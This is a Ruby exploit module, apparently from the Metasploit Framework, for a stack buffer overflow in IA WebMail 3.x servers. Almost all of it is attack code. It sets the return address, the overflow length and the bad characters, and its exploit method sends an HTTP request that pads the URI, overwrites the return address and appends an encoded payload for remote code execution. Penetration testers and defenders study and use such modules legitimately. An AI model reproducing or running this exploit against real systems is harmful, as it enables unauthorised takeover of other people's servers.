metasploit-framework/modules/exploits/windows/http/ia_webmail.rb

65 lines
1.3 KiB
Ruby
Raw Normal View History

require 'msf/core'
module Msf
class Exploits::Windows::Http::IaWebmail < Msf::Exploit::Remote
include Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IA WebMail 3.x Buffer Overflow',
'Description' => %q{
This exploits a stack overflow in the IA WebMail server.
This exploit has not been tested against a live system at
this time.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision: 3110 $',
'References' =>
[
[ 'OSVDB', '2757'],
[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
[ 'MIL', '24'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
},
'Platform' => 'win',
'Targets' =>
[
[
'IA WebMail 3.x',
{
'Ret' => 0x1002bd33,
'Length' => 1036
},
]
],
'DisclosureDate' => 'Nov 3 2003',
'DefaultTarget' => 0))
end
def exploit
print_status("Sending request...")
request(
'uri' =>
"/" + ("o" * target['Length']) +
"META" +
[target.ret].pack('V') +
payload.encoded)
handler
end
end
end